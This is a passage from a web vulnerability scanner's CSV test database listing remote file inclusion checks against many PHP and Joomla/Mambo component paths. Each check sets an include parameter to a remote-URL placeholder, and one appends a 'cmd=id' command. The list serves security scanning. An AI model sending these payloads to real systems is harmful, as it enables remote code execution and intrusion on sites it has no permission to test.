list.\",\"\",\"\"\n\"004418\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/file_o.php?absolutepath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004419\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/html/com_articles.php?absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004420\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/phpmailer/class.cs_phpmailer.php?classes_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004421\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/query.class.php?baseDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004422\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classes/tech_o.php?absolutepath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004423\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classified.php?insPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004424\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classified_right.php?language_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004425\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/classifieds/index.php?lowerTemplate=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004426\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/clear.php?bibtexrootrel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004427\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/clearinfo.php?bibtexrootrel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004428\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/click.php?dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004429\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/client.php?dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004430\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/client/faq_1/PageController.php?dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004431\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/clients/index.php?src=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004432\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cls_fast_template.php?fname=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004433\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cm68news/engine/oldnews.inc.php?addpath=@RFIURL?&\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004434\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004435\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cms/meetweb/classes/ManagerResource.class.php?root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004436\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004437\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cms/meetweb/classes/RegForm.class.php?root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004438\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cms/meetweb/classes/RegResource.class.php?root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004439\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cms/meetweb/classes/RegRightsResource.class.php?root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004440\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cms/meetweb/classes/modules.php?root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004441\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cms/modules/form.lib.php?sourceFolder=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004442\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cms/system/openengine.php?oe_classpath=@RFIURL???\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004443\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004444\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cn_config.php?tpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004445\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/coast/header.php?sections_file=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004446\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/code/berylium-classes.php?beryliumroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004447\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/code/berylium-classes.php?beryliumroot=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004448\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/code/display.php?admindir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004449\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004450\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004451\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004452\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/com_media_library/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004453\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004454\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004455\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/comments.php?AMG_serverpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004456\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/comments.php?scriptpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004457\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/common.inc.php?CFG[libdir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004458\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/common.inc.php?CFG[libdir]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004459\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/common.inc.php?base_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004460\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/common.php?db_file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004461\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/common.php?dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004462\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/common.php?ezt_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004463\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/common.php?include_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004464\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/common.php?livealbum_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004465\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/common.php?livealbum_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004466\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/common.php?locale=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004467\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/common.php?phpht_real_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004468\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/common/db.php?commonpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004469\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/common/func.php?CommonAbsD=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004470\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/common/func.php?CommonAbsDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004471\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/community/Offline.php?sourcedir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004472\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004473\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/calendar/com_calendar.php?absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004474\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/calendar/com_calendar.php?absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004475\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004476\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004477\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004478\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004479\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_articles.php?absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004480\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_articles.php?absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004481\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004482\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_calendar.php?absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004483\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_calendar.php?absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004484\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_cpg/cpg.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004485\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004486\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_facileforms/facileforms.frame.php?ff_compath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004487\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_forum/download.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004488\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_galleria/galleria.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004489\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_guestbook.php?absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004490\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_hashcash/server.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004491\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004492\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004493\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004494\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_joomlaboard/file_upload.php?sbp=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004495\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004496\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_lm/archive.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004497\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_mambowiki/MamboLogin.php?IP=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004498\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_minibb.php?absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004499\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004500\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004501\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_mospray/scripts/admin.php?basedir=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004502\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004503\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_mp3_allopass/allopass.php?mosConfig_live_site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004504\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004505\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004506\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004507\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004508\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004509\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004510\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004511\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004512\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004513\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_smf/smf.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004514\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004515\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004516\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004517\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004518\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004519\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004520\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004521\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004522\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/core/connect.php?language_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004523\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/minibb/bb_plugins.php?absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004524\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/minibb/index.php?absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004525\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/minibb/index.php?absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004526\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/components/xmlparser/loadparser.php?absoluteurl=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004527\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/compteur/mapage.php?chemin=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004528\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/conf.php?securelib=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004529\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/conf.php?securelib=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004530\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config.inc.php3?rel_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004531\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config.inc.php?_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004532\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config.inc.php?path_escape=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004533\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config.inc.php?path_escape=@RFIURL%00\",\"GET\",\"BODY:PHP 